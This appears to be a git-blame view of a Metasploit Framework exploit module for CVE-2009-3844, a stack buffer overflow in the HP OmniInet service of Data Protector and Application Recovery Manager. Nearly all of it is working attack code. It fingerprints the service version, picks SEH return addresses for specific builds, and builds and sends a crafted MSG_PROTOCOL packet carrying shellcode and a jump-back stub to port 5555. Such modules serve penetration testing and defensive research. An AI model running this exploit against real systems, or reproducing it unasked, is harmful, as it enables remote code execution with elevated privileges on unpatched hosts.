2009-12-28 21:12:11 +00:00
|
|
|
##
|
|
|
|
# $Id$
|
|
|
|
##
|
|
|
|
|
|
|
|
##
|
2010-01-06 19:28:19 +00:00
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
2009-12-28 21:12:11 +00:00
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/framework/
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2010-01-06 19:28:19 +00:00
|
|
|
Rank = GreatRanking
|
2009-12-28 21:12:11 +00:00
|
|
|
|
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
|
|
include Msf::Exploit::Remote::Seh
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
2010-01-06 19:28:19 +00:00
|
|
|
'Name' => 'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow',
|
2009-12-28 21:12:11 +00:00
|
|
|
'Description' => %q{
|
2010-01-06 19:28:19 +00:00
|
|
|
This module exploits a stack-based buffer overflow in the Hewlett-Packard
|
|
|
|
OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b)
|
|
|
|
packet, a remote attacker may be able to execute arbitrary code with elevated
|
|
|
|
privileges.
|
|
|
|
|
|
|
|
This service is installed with HP OpenView Data Protector, HP Application
|
|
|
|
Recovery Manager and potentially other products. This exploit has been tested
|
2010-01-06 20:09:34 +00:00
|
|
|
against versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1
|
2010-01-06 20:01:08 +00:00
|
|
|
of Application Recovery Manager.
|
|
|
|
|
|
|
|
NOTE: There are actually two consecutive wcscpy() calls in the program (which
|
|
|
|
may be why ZDI considered them two separate issues). However, this module only
|
2010-09-20 08:06:27 +00:00
|
|
|
exploits the second one.
|
2009-12-28 21:12:11 +00:00
|
|
|
},
|
2010-01-06 19:28:19 +00:00
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'EgiX <n0b0d13s[at]gmail.com>',
|
|
|
|
'Fairuzan Roslan <riaf[at]mysec.org>',
|
|
|
|
'jduck'
|
|
|
|
],
|
2009-12-28 21:12:11 +00:00
|
|
|
'Version' => '$Revision$',
|
|
|
|
'References' =>
|
2009-12-26 18:50:44 +00:00
|
|
|
[
|
2009-12-28 21:12:11 +00:00
|
|
|
[ 'CVE', '2009-3844' ],
|
|
|
|
[ 'BID', '37250' ],
|
2010-01-06 20:01:08 +00:00
|
|
|
[ 'OSVDB', '60852' ],
|
|
|
|
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-091' ]
|
2009-12-28 21:12:11 +00:00
|
|
|
],
|
2010-01-06 19:28:19 +00:00
|
|
|
'Privileged' => true,
|
2009-12-28 21:12:11 +00:00
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'EXITFUNC' => 'seh',
|
|
|
|
},
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 4658,
|
2010-01-06 19:28:19 +00:00
|
|
|
'BadChars' => "\x00", # (we don't want \x00\x00)
|
|
|
|
'StackAdjustment' => -3500
|
2009-12-28 21:12:11 +00:00
|
|
|
},
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Targets' =>
|
|
|
|
[
|
2010-01-06 19:28:19 +00:00
|
|
|
[ 'Automatic Targeting', { 'auto' => true } ],
|
|
|
|
|
|
|
|
# DP Targets
|
|
|
|
[ 'HP OpenView Storage Data Protector A.05.50: INET, internal build 330',
|
|
|
|
{
|
|
|
|
'Ret' => 0x004406cf # p/p/r - OmniInet.exe (v5.50.330.0)
|
|
|
|
}
|
|
|
|
],
|
|
|
|
[ 'HP OpenView Storage Data Protector A.06.00: INET, internal build 331',
|
|
|
|
{
|
|
|
|
'Ret' => 0x0044327d # p/p/r - OmniInet.exe (v6.0.331.0)
|
|
|
|
}
|
|
|
|
],
|
|
|
|
|
|
|
|
# APPRM Targets
|
|
|
|
[ 'HP StorageWorks Application Recovery Manager A.06.00: INET, internal build 81',
|
|
|
|
{
|
|
|
|
'Ret' => 0x004280ff # p/p/r - OmniInet.exe (v6.0.81.0)
|
|
|
|
}
|
|
|
|
],
|
|
|
|
[ 'HP Application Recovery Manager software A.06.10: INET, internal build 282',
|
|
|
|
{
|
|
|
|
'Ret' => 0x004412ed # p/p/r - OmniInet.exe (v6.0.282.0)
|
|
|
|
}
|
|
|
|
]
|
2009-12-28 21:12:11 +00:00
|
|
|
],
|
2010-01-06 19:28:19 +00:00
|
|
|
'DefaultTarget' => 0,
|
2011-05-04 19:17:31 +00:00
|
|
|
'DisclosureDate' => 'Dec 7 2009'))
|
2009-12-26 18:50:44 +00:00
|
|
|
|
2010-01-06 19:28:19 +00:00
|
|
|
register_options([Opt::RPORT(5555)], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def check
|
|
|
|
connect
|
|
|
|
sock.put(rand_text_alpha_upper(64))
|
|
|
|
resp = sock.get_once(-1,5)
|
|
|
|
disconnect
|
2009-12-28 21:12:11 +00:00
|
|
|
|
2010-01-06 19:28:19 +00:00
|
|
|
if (resp)
|
|
|
|
resp = resp.unpack('v*').pack('C*')
|
2010-01-06 20:09:34 +00:00
|
|
|
print_status("Received response: " + resp)
|
2010-01-06 19:28:19 +00:00
|
|
|
|
|
|
|
# extract version
|
|
|
|
if (resp =~ /HP Data Protector/)
|
|
|
|
version = resp.split[3]
|
|
|
|
elsif (resp =~ /HP OpenView Storage Data Protector/)
|
|
|
|
version = resp.split[5]
|
|
|
|
elsif (resp =~ /HP StorageWorks Application Recovery Manager/)
|
|
|
|
version = resp.split[5]
|
|
|
|
else
|
|
|
|
return Exploit::CheckCode::Detected
|
|
|
|
end
|
|
|
|
|
|
|
|
version = version.split('.')
|
|
|
|
major = version[1].to_i
|
|
|
|
minor = version[2].to_i
|
|
|
|
if ((major < 6) or (major == 6 and minor < 11))
|
|
|
|
return Exploit::CheckCode::Vulnerable
|
|
|
|
end
|
|
|
|
|
|
|
|
if ((major > 6) or (major == 6 and minor >= 11))
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
return Exploit::CheckCode::Safe
|
2009-12-28 21:12:11 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
2010-01-06 19:28:19 +00:00
|
|
|
mytarget = target
|
|
|
|
|
|
|
|
if (target['auto'])
|
|
|
|
mytarget = nil
|
|
|
|
|
|
|
|
print_status("Automatically detecting the target...")
|
|
|
|
|
|
|
|
connect
|
|
|
|
sock.put(rand_text_alpha_upper(64))
|
|
|
|
resp = sock.get_once(-1,5)
|
|
|
|
disconnect
|
2009-12-28 21:12:11 +00:00
|
|
|
|
2010-01-06 19:28:19 +00:00
|
|
|
if not resp
|
|
|
|
raise RuntimeError, "No version response returned."
|
|
|
|
end
|
|
|
|
|
|
|
|
resp = resp.unpack('v*').pack('C*')
|
2010-01-06 20:09:34 +00:00
|
|
|
print_status("Received response: " + resp)
|
2010-01-06 19:28:19 +00:00
|
|
|
|
|
|
|
self.targets.each do |t|
|
|
|
|
if (resp =~ /#{t.name}/) then
|
|
|
|
mytarget = t
|
|
|
|
break
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
if (not mytarget)
|
|
|
|
raise RuntimeError, "No matching target"
|
|
|
|
end
|
|
|
|
|
|
|
|
print_status("Selected Target: #{mytarget.name}")
|
|
|
|
else
|
|
|
|
print_status("Trying target #{mytarget.name}...")
|
|
|
|
end
|
|
|
|
|
|
|
|
# separator between arguments
|
|
|
|
sep = [0x2000].pack('N')
|
|
|
|
|
2010-01-06 20:09:34 +00:00
|
|
|
# Unicode BOM
|
2010-01-06 19:28:19 +00:00
|
|
|
pkt = "\xff\xfe"
|
|
|
|
# MSG_PROTOCOL command
|
|
|
|
pkt << Rex::Text.to_unicode("267")
|
|
|
|
|
|
|
|
# dunno
|
|
|
|
4.times do
|
|
|
|
pkt << sep
|
|
|
|
pkt << rand_text_alpha_upper(2)
|
|
|
|
end
|
|
|
|
|
|
|
|
# culprit string
|
|
|
|
pkt << sep
|
|
|
|
|
|
|
|
# the payload + seh record
|
|
|
|
pkt << payload.encoded
|
|
|
|
pkt << generate_seh_record(mytarget.ret)
|
|
|
|
|
|
|
|
# jump back
|
|
|
|
dist = payload_space + 8
|
|
|
|
pkt << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + dist.to_s).encode_string
|
|
|
|
|
|
|
|
# force exception hitting the end of the stack
|
|
|
|
pkt << rand_text_alphanumeric(1000) * 25
|
|
|
|
|
|
|
|
# end marker
|
|
|
|
pkt << sep
|
|
|
|
|
|
|
|
# packet length
|
|
|
|
buff = [pkt.length].pack('N')
|
|
|
|
buff << pkt
|
|
|
|
|
|
|
|
connect
|
|
|
|
print_status("Sending MSG_PROTOCOL packet...")
|
2009-12-28 21:12:11 +00:00
|
|
|
sock.put(buff)
|
|
|
|
|
|
|
|
handler
|
|
|
|
disconnect
|
2010-01-06 19:28:19 +00:00
|
|
|
|
2009-12-28 21:12:11 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
end
|